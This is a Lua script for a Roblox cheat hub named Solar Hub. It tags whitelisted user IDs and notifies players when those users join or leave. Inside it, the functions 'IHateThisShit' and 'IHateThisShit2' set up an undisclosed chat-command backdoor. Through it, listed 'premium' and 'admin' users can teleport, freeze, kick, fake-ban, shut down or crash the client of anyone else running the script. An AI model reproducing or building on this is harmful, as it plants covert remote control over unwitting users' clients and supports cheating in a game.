-- made by xurel textchatservice method found on v3rm

local List = {
    Premium = {
        3989824437,
        4006433577,
        859041651,
        2580980319,
        424883150,
        564374063,
        1133869735,
        2839811203,
        267770568,
        195532999,
        885873293,
        4148978554,
        317398046,
        3177904794,
        1974376892,
        3587101817,
        1527860228,
        263061473,
        4163247195,
        885873293,
        209670259,
        2458804512,
        623394254,
        3498924989,
        4860885462,
        4864268101,
        2407063897,
        1242652582,
        4848908217,
        4875780060,
        4766222492
    },
    Immunity = {
        4528438526,
        1234,
        1234,
    },
    Booster = {
        2319687767,
        753511215,
        1450647945,
        1669108758,
        4731271623,
        296906595,
        4874196826,
        4873487130,
        717958072
    },
    Moderator = {
        1234,
        1234,
        1234,
    },

    Admin = {
        2450635720,
        759881255,
        275263932,
    },
}

local originPos
-- tag handling

function TagHandler()
    for i, v in pairs(game.Players:GetPlayers()) do
        if table.find(List.Premium, v.UserId) and v.Character then
            local nameTag = v.Character.Head:FindFirstChild("Nametag")
            local bannerTag = game.Workspace:FindFirstChild("Banner"..v.Name)
            if not bannerTag then
                bannerTag = v.Character:FindFirstChild("Banner"..v.Name)
            end    
            local texting = bannerTag:FindFirstChild("BillboardGui")

            if nameTag:IsA("BillboardGui") and texting:IsA("BillboardGui") then
                nameTag:FindFirstChild("TextLabel").Text = "[⭐] "..v.Name
                nameTag:FindFirstChild("TextLabel").Shadow.Text = "[⭐] "..v.Name
                texting.Frame.Username.Text = "⭐"..v.Name.."⭐"
            end
        elseif table.find(List.Admin, v.UserId) and v.Character then
            local nameTag = v.Character.Head:FindFirstChild("Nametag")
            local bannerTag = game.Workspace:FindFirstChild("Banner"..v.Name)
            if not bannerTag then
                bannerTag = v.Character:FindFirstChild("Banner"..v.Name)
            end    
            local texting = bannerTag:FindFirstChild("BillboardGui")

            if nameTag:IsA("BillboardGui") and texting:IsA("BillboardGui") then
                nameTag:FindFirstChild("TextLabel").Text = "[👑] "..v.Name
                nameTag:FindFirstChild("TextLabel").Shadow.Text = "[👑] "..v.Name
                texting.Frame.Username.Text = "👑OWNER OF SOLAR HUB👑"
            end
        elseif table.find(List.Moderator, v.UserId) and v.Character then
            local nameTag = v.Character.Head:FindFirstChild("Nametag")
            local bannerTag = game.Workspace:FindFirstChild("Banner"..v.Name)
            if not bannerTag then
                bannerTag = v.Character:FindFirstChild("Banner"..v.Name)
            end    
            local texting = bannerTag:FindFirstChild("BillboardGui")

            if nameTag:IsA("BillboardGui") and texting:IsA("BillboardGui") then
                nameTag:FindFirstChild("TextLabel").Text = "[🤴] "..v.Name
                nameTag:FindFirstChild("TextLabel").Shadow.Text = "[🤴] "..v.Name
                texting.Frame.Username.Text = "🤴SOLAR HUB MODERATOR🤴"
            end
        elseif table.find(List.Booster, v.UserId) and v.Character then
            local nameTag = v.Character.Head:FindFirstChild("Nametag")
            local bannerTag = game.Workspace:FindFirstChild("Banner"..v.Name)
            if not bannerTag then
                bannerTag = v.Character:FindFirstChild("Banner"..v.Name)
            end    
            local texting = bannerTag:FindFirstChild("BillboardGui")

            if nameTag:IsA("BillboardGui") and texting:IsA("BillboardGui") and v.UserId ~= 1450647945 then
                nameTag:FindFirstChild("TextLabel").Text = "[🌸] "..v.Name
                nameTag:FindFirstChild("TextLabel").Shadow.Text = "[🌸] "..v.Name
                texting.Frame.Username.Text = "🌸SOLAR HUB BOOSTER🌸"
            end
        end
    end
end


-- premium command shit
function IHateThisShit()
if table.find(List.Premium, game.Players.LocalPlayer.UserId) or table.find(List.Admin, game.Players.LocalPlayer.UserId) or table.find(List.Immunity, game.Players.LocalPlayer.UserId) or table.find(List.Booster, game.Players.LocalPlayer.UserId) then else
    game.TextChatService.MessageReceived:Connect(function(message)
        local isGame = game.Players.LocalPlayer:FindFirstChild("Values")
        if not isGame then
            isGame = false
        elseif game.PlaceId == 11736628397 then
            isGame = false
            else
            isGame = game.Players.LocalPlayer:FindFirstChild("Values"):FindFirstChild("InGame").Value
        end
        local text = message.Text
        local id = message.TextSource.UserId
        if table.find(List.Premium, id) then
            if text == "!bring" then
                originPos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
                for i, v in pairs(game.Players:GetPlayers()) do
                    if v.UserId == id and v.Character then
                        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame
                    end
                end
            elseif text == "!goback" then
                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = originPos
            elseif text == "!freeze" then
                if isGame == false then
                game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
                end
            elseif text == "!unfreeze" then
                game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
            elseif text == "!check" then
                game:GetService("TextChatService").TextChannels.RBXGeneral:SendAsync("trent 😁")
            elseif text == "!kick" then
                if isGame == false then
                game.Players.LocalPlayer:Kick("kicked by "..tostring(message.TextSource))
                end
            elseif text == "!fakeban" then
                if isGame == false then
                game.Players.LocalPlayer:Kick("YOU HAVE BEEN PERMANENTLY BANNED FROM HOOPS LIFE !")
                end
            elseif text == "!close" then
                if isGame == false then
                game:Shutdown()
                end
            elseif text == "!crash" then
                if isGame == false then
                while true do end
                end
            end
        end
    end)
end
end

function IHateThisShit2()
if table.find(List.Admin, game.Players.LocalPlayer.UserId) then else
    game.TextChatService.MessageReceived:Connect(function(message)
        local text = message.Text
        local id = message.TextSource.UserId
        if table.find(List.Admin, id) then
            if text == "!bring" then
                originPos = game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame
                for i, v in pairs(game.Players:GetPlayers()) do
                    if v.UserId == id and v.Character then
                        game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = v.Character.HumanoidRootPart.CFrame
                    end
                end
            elseif text == "!goback" then
                game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = originPos
            elseif text == "!freeze" then
                game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = true
            elseif text == "!unfreeze" then
                game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
            elseif text == "!check" then
                game:GetService("TextChatService").TextChannels.RBXGeneral:SendAsync("xurel my dad 😁")
            elseif text == "!kick" then
                game.Players.LocalPlayer:Kick("kicked by "..tostring(message.TextSource))
            elseif text == "!fakeban" then
                game.Players.LocalPlayer:Kick("YOU HAVE BEEN PERMANENTLY BANNED FROM HOOPS LIFE !")
            elseif text == "!close" then
                game:Shutdown()
            elseif text == "!crash" then
                while true do end
            end
        end
    end)
end
end

-- check if an admin/premium user is already in game

for i, v in pairs(game.Players:GetPlayers()) do
    if table.find(List.Premium, v.UserId) then
        game.StarterGui:SetCore("SendNotification", {
            Title = "Solar Hub",
            Text = "Solar Hub Premium Member "..v.Name.." is in your game!",
            Duration = 60
        })
    elseif table.find(List.Admin, v.UserId) then
        game.StarterGui:SetCore("SendNotification", {
            Title = "Solar Hub",
            Text = "Solar Hub Admin "..v.Name.." is in your game!",
            Duration = 60
        })
    end
end

-- check if admin/premium user has joined/left the game


game.Players.PlayerAdded:Connect(function(v)
    if table.find(List.Premium, v.UserId) then
       game.StarterGui:SetCore("SendNotification", {
            Title = "Solar Hub",
            Text = "Solar Hub Premium Member "..v.Name.." has joined your game!",
            Duration = 60
        })
    elseif table.find(List.Admin, v.UserId) then
        game.StarterGui:SetCore("SendNotification", {
            Title = "Solar Hub",
            Text = "Solar Hub Admin "..v.Name.." has joined your game!",
            Duration = 120
        })
    end
end)

game.Players.PlayerRemoving:Connect(function(v)
    if table.find(List.Premium, v.UserId) then
       game.StarterGui:SetCore("SendNotification", {
            Title = "Solar Hub",
            Text = "Solar Hub Premium Member "..v.Name.." has left your game!",
            Duration = 60
        })
game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = originPos
    elseif table.find(List.Admin, v.UserId) then
        game.StarterGui:SetCore("SendNotification", {
            Title = "Solar Hub",
            Text = "Solar Hub Admin "..v.Name.." has left your game!",
            Duration = 120
        })
game.Players.LocalPlayer.Character.HumanoidRootPart.Anchored = false
game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = originPos
    end
end)

-- loop the tag function  (incase user dies)
pcall(IHateThisShit)
pcall(IHateThisShit2)
while wait(3) do
    pcall(TagHandler)
end
